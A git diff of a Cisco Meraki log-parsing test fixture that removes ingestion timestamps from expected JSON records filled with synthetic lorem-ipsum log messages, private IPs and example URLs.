+220,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402813796Z" - }, "message": "smo etcons.iusmodi uamest_ security_event uiac security_event epte signature=idolo priority=quinesc timestamp=1483686701.madmi shost=01:00:5e:1c:4c:64 direction=internal protocol=icmp src=10.31.77.157 dst=10.12.182.70 message:tev", "tags": [ "preserve_original_event" @@ -304,9 +229,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402814698Z" - }, "message": "nisiuta 1484921656.roid inibusB flows cancel", "tags": [ "preserve_original_event" @@ -316,9 +238,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402815606Z" - }, "message": "str 1486156610.idolore pid_ flows cteturad flows deny src=10.93.68.231 dst=10.135.217.12 mac=01:00:5e:4a:69:5b protocol=ipv6 type=archite ", "tags": [ "preserve_original_event" @@ -328,9 +247,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402816477Z" - }, "message": "amnih 1487391564.ium esciuntN_ events dhcp release for mac 01:00:5e:8b:99:98", "tags": [ "preserve_original_event" @@ -340,9 +256,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402817329Z" - }, "message": "isnost 1488626519.queips ncidi_ flows iscinge flows src=10.247.30.212 dst=10.66.89.5 mac=01:00:5e:7f:65:da protocol=igmp pattern: 1 borios", "tags": [ "preserve_original_event" @@ -352,9 +265,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402818188Z" - }, "message": "oin 1489861473.mvenia madminim events IDS: fugitsed", "tags": [ "preserve_original_event" @@ -364,9 +274,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402819089Z" - }, "message": "dmin fugi.quia iduntu security_event idestlab signature=rnatur priority=ofdeFin timestamp=1491096427.essequam dhost=01:00:5e:c1:53:b1 direction=inbound protocol=tcp src=10.221.102.245 dst=10.173.136.186 message:naal", "tags": [ "preserve_original_event" @@ -376,9 +283,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402819955Z" - }, "message": "umqu tinv.adipisc uscipitl_ ids-alerts ritatise ids-alerts signature=uamei priority=siut timestamp=1492331381.ciad dhost=01:00:5e:1f:c6:29 direction=external protocol=udp src=10.58.64.108 dst=10.54.37.86 message: entorev", "tags": [ "preserve_original_event" @@ -388,9 +292,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402820928Z" - }, "message": "velitess 1493566336.naali uunturm_ flows veli flows block src=10.147.76.202 dst=10.163.93.20 mac=01:00:5e:1d:85:ec protocol=ipv6 sport=1085 dport=3141 ", "tags": [ "preserve_original_event" @@ -400,9 +301,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402821803Z" - }, "message": "iumdol tpersp.stla uptatema_ security_event uradi security_event tot signature=llamco priority=nea timestamp=1494801290.psum dhost=01:00:5e:35:71:1e direction=internal protocol=icmp src=10.0.200.27:5905 dst=10.183.44.198:1702 message:asiarc", "tags": [ "preserve_original_event" @@ -412,9 +310,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402822774Z" - }, "message": "tiaec 1496036244.rumwrit icabo_ events dhcp lease of ip 10.148.124.84 from server mac 01:00:5e:0b:2c:22 for client mac 01:00:5e:06:12:98 from router 10.28.144.180 on subnet ritin with dns temporin", "tags": [ "preserve_original_event" @@ -424,9 +319,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402823636Z" - }, "message": "ica 1497271198.lillum remips_appliance events aid=uisaute arp_resp=imide arp_src=poriss auth_neg_dur=tvolup auth_neg_failed=itesseq channel=dictasun dns_req_rtt=veniamqu dns_resp=rum dns_server=quaea duration=165.611000 full_conn=mvel identity=nof ip_resp=usmodi ip_src=10.204.230.166 is_8021x=dat is_wpa=aincidu last_auth_ago=nimadmin radio=isiu reason=licabo rssi=enimadmi type=utaliqu vap=dic client_mac=01:00:5e:bb:60:a6 client_ip=10.62.71.118 instigator=ineavol http_resp=iosa dhcp_lease_completed=boNemoe dhcp_ip=onsequ dhcp_server=equinesc dhcp_server_mac=cab dhcp_resp=atisund url=https://example.net/ites/isetq.gif?nisiut=tur#avolupt category0=ariatur server=10.98.194.212 vpn_type=nimave connectivity=isciv", "tags": [ "preserve_original_event" @@ -436,9 +328,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402824495Z" - }, "message": "dipisci 1498506153.spernatu admi events content_filtering_block url='https://www.example.org/ueipsa/tae.html?eriti=atcupi#corpori' category0='borisnis' server='10.197.13.39:5912'", "tags": [ "preserve_original_event" @@ -448,9 +337,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402859624Z" - }, "message": "itsedd 1499741107.leumiur eratvol events dhcp release for mac 01:00:5e:fd:84:bb", "tags": [ "preserve_original_event" @@ -460,9 +346,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402860969Z" - }, "message": "leumiu tla.item nimid ids-alerts signature=dat priority=periam timestamp=1500976061.dquprotocol=icmp src=10.242.77.170 dst=10.150.245.88message: orisn", "tags": [ "preserve_original_event" @@ -472,9 +355,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402861866Z" - }, "message": "sitam rad.loi isc_ ids-alerts volupt ids-alerts signature=rem priority=idid timestamp=1502211015.tesse shost=01:00:5e:9d:eb:fb direction=external protocol=tcp src=10.247.139.239 dst=10.180.195.43 message: tenatuse", "tags": [ "preserve_original_event" @@ -484,9 +364,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402862738Z" - }, "message": "tore 1503445970.elits consequa events dhcp release for mac 01:00:5e:50:48:c4", "tags": [ "preserve_original_event" @@ -496,9 +373,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402863582Z" - }, "message": "undeom uamnihi.risnis uov_ ids-alerts isn ids-alerts signature=sBono priority=loremqu timestamp=1504680924.teturprotocol=rdp src=10.94.6.140 dst=10.147.15.213message: uptat", "tags": [ "preserve_original_event" @@ -508,9 +382,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402864441Z" - }, "message": "itasper 1505915878.uae mve_ flows obeata flows block src=10.230.6.127 dst=10.111.157.56 mac=01:00:5e:39:a7:fc protocol=icmp type=aliquamq ", "tags": [ "preserve_original_event" @@ -520,9 +391,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402865373Z" - }, "message": "archite 1507150832.remq veniamq events aid=occ arp_resp=oloreseo arp_src=iruredol auth_neg_dur=veniamqu auth_neg_failed=licaboN channel=atquo dns_req_rtt=cupi dns_resp=strude dns_server=eritin duration=85.513000 full_conn=litsedq identity=nderiti ip_resp=ntNe ip_src=10.179.40.170 is_8021x=olorema is_wpa=mollita last_auth_ago=tatem radio=iae reason=quido rssi=emip type=inBC vap=mol client_mac=01:00:5e:58:2d:1c client_ip=10.153.81.206 instigator=rsita http_resp=nsequun dhcp_lease_completed=eetd dhcp_ip=illu dhcp_server=iatqu dhcp_server_mac=lorsi dhcp_resp=repreh url=https://www.example.net/irured/illumqui.txt?tionula=ritqu#ecatcupi category0=uamei server=10.193.219.34 vpn_type=onse connectivity=olorem", "tags": [ "preserve_original_event" @@ -532,9 +400,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402866225Z" - }, "message": "umwritte 1508385787.vol oremquel_appliance events MAC 01:00:5e:16:5e:b1 and MAC 01:00:5e:ee:e8:77 both claim IP: 10.255.199.16", "tags": [ "preserve_original_event" @@ -544,9 +409,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402867073Z" - }, "message": "unte 1509620741.uamnihil llam_appliance events MAC 01:00:5e:ee:1d:77 and MAC 01:00:5e:f1:21:bd both claim IP: 10.94.88.5", "tags": [ "preserve_original_event" @@ -556,9 +418,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402867921Z" - }, "message": "esci 1510855695.uov quaeab_ events IDS: moles", "tags": [ "preserve_original_event" @@ -568,9 +427,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402868775Z" - }, "message": "accusa 1512090649.natu liquid events IDS: enim", "tags": [ "preserve_original_event" @@ -580,9 +436,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402869648Z" - }, "message": "dquiaco nibus.vitaed ser security_event etconsec signature=elillum priority=upt timestamp=1513325604.rnat dhost=01:00:5e:01:60:e0 direction=internal protocol=ipv6 src=10.90.99.245 dst=10.124.63.4 message:pta", "tags": [ "preserve_original_event" @@ -592,9 +445,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402870491Z" - }, "message": "tetura 1514560558.imadmini moe_appliance events content_filtering_block url='https://mail.example.net/uat/lupta.html?uptassit=ncidi#tlabori' category0='laudan' server='10.249.7.146:2010'", "tags": [ "preserve_original_event" @@ -604,9 +454,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402871577Z" - }, "message": "lapar 1515795512.ritati edquia_appliance events IDS: itesse", "tags": [ "preserve_original_event" @@ -616,9 +463,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402872431Z" - }, "message": "amvolu mip.tion tobeatae_ security_event Utenima security_event iqua signature=luptat priority=deriti timestamp=1517030466.sintocc dhost=01:00:5e:c9:b7:22 direction=inbound protocol=icmp src=10.196.96.162 dst=10.81.234.34 message:equuntur", "tags": [ "preserve_original_event" @@ -628,9 +472,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402873284Z" - }, "message": "uide 1518265421.scivel henderi_appliance events IDS: iusmodt", "tags": [ "preserve_original_event" @@ -640,9 +481,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402874155Z" - }, "message": "tiumd 1519500375.ntmoll mexer events dhcp lease of ip 10.40.101.224 from server mac 01:00:5e:0a:df:72 for client mac 01:00:5e:7c:01:ab with hostname remips188.api.invalid from router 10.78.199.43 on subnet ehender with dns ilmole", "tags": [ "preserve_original_event" @@ -652,9 +490,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402875353Z" - }, "message": "runtmo 1520735329.ore isund_appliance events MAC 01:00:5e:17:87:3e and MAC 01:00:5e:5f:c1:3e both claim IP: 10.244.29.119", "tags": [ "preserve_original_event" @@ -664,9 +499,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402876192Z" - }, "message": "tutlabor 1521970284.reseosq gna_ flows pteurs flows deny src=10.83.131.245 dst=10.39.172.93 mac=01:00:5e:c4:12:c7 protocol=udp type=uido ", "tags": [ "preserve_original_event" @@ -676,9 +508,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402877035Z" - }, "message": "osquira 1523205238.umd sciveli_ events dhcp lease of ip 10.86.188.179 from server mac 01:00:5e:48:4b:78 for client mac 01:00:5e:7e:cd:15 from router 10.201.168.116 on subnet umiure with dns laborum", "tags": [ "preserve_original_event" @@ -688,9 +517,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402877879Z" - }, "message": "umdolors 1524440192.lumdo acom_ security_event umexercisecurity_event duntut url=https://mail.example.com/prehend/eufug.htm?eufug=est#civelits src=10.148.211.222:2053 dst=10.122.204.151:3903 mac=01:00:5e:c3:a0:dc name=ine sha256=urerepre disposition=asnulap action=deny", "tags": [ "preserve_original_event" @@ -700,9 +526,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402878756Z" - }, "message": "atnul 1525675146.umfugi stquidol_ flows luptatem flows accept", "tags": [ "preserve_original_event" @@ -712,9 +535,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402879608Z" - }, "message": "essequam ueporro.aliqu upt ids-alerts signature=orum priority=Bonoru timestamp=1526910101.madminimprotocol=ipv6-icmp src=10.97.46.16 dst=10.120.4.9message: teni", "tags": [ "preserve_original_event" @@ -724,9 +544,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402880460Z" - }, "message": "lorsitam tanimid.onpr litseddo_ ids-alerts oremqu ids-alerts signature=idex priority=radip timestamp=1528145055.uptaprotocol=ipv6-icmp src=10.171.206.139 dst=10.165.173.162message: lestia", "tags": [ "preserve_original_event" @@ -736,9 +553,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402881305Z" - }, "message": "inibusB 1529380009.nostrud cteturad events dhcp lease of ip 10.150.163.151 from server mac 01:00:5e:72:b7:79 for client mac 01:00:5e:f2:d3:12 with hostname uames4985.mail.localdomain from router 10.144.57.239 on subnet oinBCSed with dns orem", "tags": [ "preserve_original_event" @@ -748,9 +562,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402882160Z" - }, "message": "eritq rehen.ipsamvol elillum_ ids-alerts tco ids-alerts signature=tvol priority=oluptate timestamp=1530614963.lit shost=01:00:5e:ac:6d:d3 direction=unknown protocol=igmp src=10.52.202.158 dst=10.54.44.231 message: Ute", "tags": [ "preserve_original_event" @@ -760,9 +571,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402883012Z" - }, "message": "runtm 1531849918.eturadip olorsi_ events MAC 01:00:5e:67:1d:0f and MAC 01:00:5e:f0:a9:cd both claim IP: 10.101.183.86", "tags": [ "preserve_original_event" @@ -772,9 +580,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402883878Z" - }, "message": "inesciu 1533084872.quid atcupid_ flows orem flows src=10.71.22.225 dst=10.4.76.100 protocol=ggp pattern: allow serrorsi", "tags": [ "preserve_original_event" @@ -784,9 +589,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402884730Z" - }, "message": "lamco 1534319826.cit siar events MAC 01:00:5e:80:cd:ca and MAC 01:00:5e:45:aa:51 both claim IP: 10.83.130.95", "tags": [ "preserve_original_event" @@ -796,9 +598,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402885579Z" - }, "message": "hite 1535554780.ianonnum nofdeFi events aid=henderit arp_resp=remq arp_src=unt auth_neg_dur=tla auth_neg_failed=arch channel=lite dns_req_rtt=ugia dns_resp=meum dns_server=borumSec duration=91.439000 full_conn=nvolupta identity=tev ip_resp=nre ip_src=10.2.110.73 is_8021x=eturadip is_wpa=ent last_auth_ago=rumSecti radio=Utenima reason=olore rssi=orumS type=olor vap=radip client_mac=01:00:5e:59:bf:36 client_ip=10.230.98.81 instigator=aaliquaU http_resp=olu dhcp_lease_completed=iameaque dhcp_ip=identsun dhcp_server=ender dhcp_server_mac=inc dhcp_resp=tect url=https://www.example.net/doconse/eni.html?mSec=smoditem#tatisetq category0=uidolo server=10.103.49.129 vpn_type=oquisq connectivity=abori", "tags": [ "preserve_original_event" @@ -808,9 +607,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402886438Z" - }, "message": "dunt 1536789735.ames amni events aid=tatio arp_resp=amquisno arp_src=modoc auth_neg_dur=magnam auth_neg_failed=uinesc channel=cid dns_req_rtt=emi dns_resp=Bonorum dns_server=lesti duration=59.289000 full_conn=iosamni identity=idu ip_resp=sis ip_src=10.158.61.228 is_8021x=tsedquia is_wpa=its last_auth_ago=umdolor radio=isiu reason=assi rssi=eserun type=rvelill vap=lupta client_mac=01:00:5e:e6:a6:a2 client_ip=10.186.16.20 instigator=tisu http_resp=remagnam dhcp_lease_completed=nvolupt dhcp_ip=meiusm dhcp_server=nidolo dhcp_server_mac=atquovol dhcp_resp=quunt url=https://www.example.com/seq/moll.htm?sunt=dquianon#urExc category0=tDuis server=10.132.176.96 vpn_type=aria connectivity=inim", "tags": [ "preserve_original_event" @@ -820,9 +616,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402887291Z" - }, "message": "oremeumf 1538024689.lesti sintocca events dhcp lease of ip 10.105.136.146 from server mac 01:00:5e:bb:aa:f6 for client mac 01:00:5e:69:92:4a with hostname lors2232.api.example from router 10.46.217.155 on subnet amnihil with dns orissus", "tags": [ "preserve_original_event" @@ -832,9 +625,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402888137Z" - }, "message": "nimadmin 1539259643.lumqui quiavolu flows src=10.245.199.23 dst=10.123.62.215 mac=01:00:5e:1f:7f:1d protocol=udp pattern: 0 iusmodt", "tags": [ "preserve_original_event" @@ -844,9 +634,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402888988Z" - }, "message": "rep 1540494597.remap deri flows cancel src=10.239.105.121 dst=10.70.7.23 mac=01:00:5e:8e:82:f0 protocol=ipv6 ", "tags": [ "preserve_original_event" @@ -856,9 +643,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402889888Z" - }, "message": "idexeac 1541729552.nimadmin midest_appliance events aid=modt arp_resp=iduntutl arp_src=rsitam auth_neg_dur=xercit auth_neg_failed=ulpaquio channel=itqu dns_req_rtt=minimav dns_resp=smodtem dns_server=roquisqu duration=116.294000 full_conn=iquid identity=evo ip_resp=mcorpori ip_src=10.196.176.243 is_8021x=itesse is_wpa=expl last_auth_ago=essecill radio=totamre reason=rpo rssi=velites type=nonpro vap=nula client_mac=01:00:5e:99:a6:b4 client_ip=10.90.50.149 instigator=nemulla http_resp=asp dhcp_lease_completed=dexercit dhcp_ip=amn dhcp_server=itessequ dhcp_server_mac=porissu dhcp_resp=umd url=https://www.example.net/sectetur/edquian.html?turQuis=taevi#uames category0=tconsec server=10.16.230.121 vpn_type=laboree connectivity=udantiu", "tags": [ "preserve_original_event" @@ -868,9 +652,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402890747Z" - }, "message": "ttenb olor.quiav gna security_event Nem signature=tdolorem priority=eacomm timestamp=1542964506.upidata dhost=01:00:5e:6a:c8:f8 direction=unknown protocol=ipv6 src=10.246.152.72:4293 dst=10.34.62.190:1641 message:eve", "tags": [ "preserve_original_event" @@ -880,9 +661,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402891635Z" - }, "message": "quisn 1544199460.rem ulamcola events dhcp no offers for mac 01:00:5e:67:fc:cb", "tags": [ "preserve_original_event" @@ -892,9 +670,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402892676Z" - }, "message": "eruntmo 1545434414.nimve usanti_ events dhcp release for mac 01:00:5e:7d:de:f7", "tags": [ "preserve_original_event" @@ -904,9 +679,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402897820Z" - }, "message": "uatu 1546669369.olupta consequu_ events dhcp release for mac 01:00:5e:6b:96:f2", "tags": [ "preserve_original_event" @@ -916,9 +688,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402900543Z" - }, "message": "sitam inibusBo.illoin emUtenim ids-alerts signature=ende priority=dexea timestamp=1547904323.acoprotocol=ipv6 src=10.244.32.189 dst=10.121.9.5message: uptas", "tags": [ "preserve_original_event" @@ -928,9 +697,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402902009Z" - }, "message": "edol 1549139277.sequuntu quameius_ events content_filtering_block url='https://www.example.com/totamrem/aliqu.htm?sBonorum=moenimi#lor' category0='auto' server='10.41.124.15:333'", "tags": [ "preserve_original_event" @@ -940,9 +706,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402903304Z" - }, "message": "antium 1550374232.remaper eseosq events dhcp no offers for mac 01:00:5e:c3:77:27", "tags": [ "preserve_original_event" @@ -952,9 +715,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402904182Z" - }, "message": "oditau 1551609186.onsec dit events MAC 01:00:5e:19:86:21 and MAC 01:00:5e:ed:ed:79 both claim IP: 10.43.235.230", "tags": [ "preserve_original_event" @@ -964,9 +724,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402905133Z" - }, "message": "asper dictasun.psa lorese_ ids-alerts ctobeat ids-alerts signature=onsec priority=idestl timestamp=1552844140.litani shost=01:00:5e:a0:b2:c9 direction=unknown protocol=icmp src=10.199.19.205:5823 dst=10.103.91.159:7116 message: ntut", "tags": [ "preserve_original_event" @@ -976,9 +733,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402906346Z" - }, "message": "estiaec 1554079094.pitlabo tas_appliance flows src=10.17.111.91 dst=10.65.0.157 mac=01:00:5e:49:c4:17 protocol=udp pattern: 1 nostrum", "tags": [ "preserve_original_event" @@ -988,9 +742,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402907198Z" - }, "message": "ercitati 1555314049.atem serro flows cancel", "tags": [ "preserve_original_event" @@ -1000,9 +751,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402908149Z" - }, "message": "amquaera 1556549003.rsitamet leumiur events MAC 01:00:5e:fd:79:9e and MAC 01:00:5e:4d:c0:dd both claim IP: 10.20.130.88", "tags": [ "preserve_original_event" @@ -1012,9 +760,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402909011Z" - }, "message": "abill ametcon.ofdeFini tasnu_ ids-alerts tionev ids-alerts signature=uasiarch priority=velites timestamp=1557783957.uredolorprotocol=ipv6 src=10.177.64.152 dst=10.140.242.86message: temporin", "tags": [ "preserve_original_event" @@ -1024,9 +769,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402909867Z" - }, "message": "lor nvolupt.dquia ora_ security_event dipi security_event ecatc signature=quovolu priority=ite timestamp=1559018911.itse shost=01:00:5e:b8:73:c8 direction=external protocol=icmp src=10.199.103.185:2449 dst=10.51.121.223:24 message:stenat", "tags": [ "preserve_original_event" @@ -1036,9 +778,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402910758Z" - }, "message": "saq 1560253866.asiarch ssuscipi events MAC 01:00:5e:93:48:61 and MAC 01:00:5e:21:c2:55 both claim IP: 10.126.242.58", "tags": [ "preserve_original_event" @@ -1048,9 +787,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402911649Z" - }, "message": "tlab 1561488820.vel ionevo events dhcp release for mac 01:00:5e:8a:1a:f9", "tags": [ "preserve_original_event" @@ -1060,9 +796,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402912501Z" - }, "message": "aeab 1562723774.uradipis aerat_ flows uira flows deny src=10.121.37.244 dst=10.113.152.241 mac=01:00:5e:9c:86:62 protocol=udp type=utaliqui ", "tags": [ "preserve_original_event" @@ -1072,9 +805,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402913354Z" - }, "message": "nesciu 1563958728.mali roinBCSe_appliance events aid=eetdolor arp_resp=tpersp arp_src=assi auth_neg_dur=rch auth_neg_failed=psa channel=nreprehe dns_req_rtt=pidatatn dns_resp=isno dns_server=luptatev duration=39.622000 full_conn=lla identity=urau ip_resp=aeca ip_src=10.247.118.132 is_8021x=atcupi is_wpa=enima last_auth_ago=uptateve radio=fugitsed reason=lumqui rssi=ectet type=ionu vap=eratv client_mac=01:00:5e:10:8b:c3 client_ip=10.153.33.99 instigator=liq http_resp=xerc dhcp_lease_completed=atisetqu dhcp_ip=squir dhcp_server=gnaaliq dhcp_server_mac=quam dhcp_resp=deriti url=https://www5.example.org/eturadi/umS.txt?mSecti=henderi#taevitae category0=tevel server=10.254.96.130 vpn_type=ita connectivity=iquipexe", "tags": [ "preserve_original_event" @@ -1084,9 +814,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402914214Z" - }, "message": "tot 1565193683.reme emeumfu events aid=inBCSedu arp_resp=ita arp_src=ade auth_neg_dur=nihilmol auth_neg_failed=nder channel=ano dns_req_rtt=rumexer dns_resp=eab dns_server=iaconseq duration=18.963000 full_conn=eli identity=rissusci ip_resp=ectetur ip_src=10.101.13.122 is_8021x=oconsequ is_wpa=roqui last_auth_ago=oluptate radio=ntut reason=mremaper rssi=uteirur type=ntium vap=ide client_mac=01:00:5e:95:ae:d0 client_ip=10.78.143.52 instigator=ntiumdol http_resp=conse dhcp_lease_completed=aturve dhcp_ip=edqui dhcp_server=tvolu dhcp_server_mac=psu dhcp_resp=strud url=https://internal.example.org/fdeFi/ratv.htm?sequatu=tiumtot#tate category0=udanti server=10.200.98.243 vpn_type=cteturad connectivity=umq", "tags": [ "preserve_original_event" @@ -1096,9 +823,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402915077Z" - }, "message": "oinvento 1566428637.mporin orissusc_appliance events content_filtering_block url='https://www5.example.net/uov/pariat.htm?litsed=lumd#tiaec' category0='lorem' server='10.247.205.185:7676' client_mac='01:00:5e:6f:21:c8'", "tags": [ "preserve_original_event" @@ -1108,9 +832,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402915952Z" - }, "message": "metMa emoen.ptate mipsumqu_ ids-alerts ccusa ids-alerts signature=billo priority=doloremi timestamp=1567663591.ectetura dhost=01:00:5e:0a:88:bb direction=inbound protocol=ipv6 src=10.195.90.73:3914 dst=10.147.165.30:7662 message: idents", "tags": [ "preserve_original_event" @@ -1120,9 +841,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402916820Z" - }, "message": "veniamqu 1568898545.iconsequ ueporr_appliance events IDS: empor", "tags": [ "preserve_original_event" @@ -1132,9 +850,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402917680Z" - }, "message": "atDuisa mipsa.uas iat ids-alerts signature=hite priority=adipis timestamp=1570133500.abo dhost=01:00:5e:dd:cb:5b direction=inbound protocol=udp src=10.137.166.97 dst=10.162.202.14 message: ipsaqua", "tags": [ "preserve_original_event" @@ -1144,9 +859,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402918551Z" - }, "message": "deom 1571368454.tiumdo rautod_appliance events content_filtering_block url='https://www5.example.com/illoinve/etcon.htm?nevolup=erspici#itinvolu' category0='adeserun' server='10.227.135.142:6598'", "tags": [ "preserve_original_event" @@ -1156,9 +868,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402919417Z" - }, "message": "orese 1572603408.umdolore umqui_appliance events MAC 01:00:5e:f1:b8:3a and MAC 01:00:5e:37:9c:af both claim IP: 10.199.29.19", "tags": [ "preserve_original_event" @@ -1168,9 +877,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402920282Z" - }, "message": "explicab 1573838362.samvolu teiru_appliance events dhcp no offers for mac 01:00:5e:b8:06:92", "tags": [ "preserve_original_event" @@ -1180,9 +886,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402921147Z" - }, "message": "rissusci 1575073317.uaturQ iusmod_ events aid=mips arp_resp=iduntutl arp_src=mipsumd auth_neg_dur=eiusmo auth_neg_failed=quelauda channel=rcit dns_req_rtt=dolo dns_resp=ulamc dns_server=doe duration=10.574000 full_conn=remquela identity=toreve ip_resp=squirat ip_src=10.85.59.172 is_8021x=mto is_wpa=iae last_auth_ago=dent radio=Uten reason=tatiset rssi=sequat type=modoco vap=beataevi client_mac=01:00:5e:92:d8:95 client_ip=10.158.215.216 instigator=deritin http_resp=ptate dhcp_lease_completed=lloi dhcp_ip=nseq dhcp_server=equunt dhcp_server_mac=tutla dhcp_resp=usmod url=https://example.com/qui/itse.gif?orsitame=tasn#exeaco category0=upta server=10.75.122.111 vpn_type=reprehe connectivity=deFinib", "tags": [ "preserve_original_event" @@ -1192,9 +895,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402922010Z" - }, "message": "orr 1576308271.pre aute events IDS: rchite", "tags": [ "preserve_original_event" diff --git a/packages/cisco_meraki/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_meraki/data_stream/log/elasticsearch/ingest_pipeline/default.yml index 546c92efd60..b18eacfd43b 100644 --- a/packages/cisco_meraki/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ 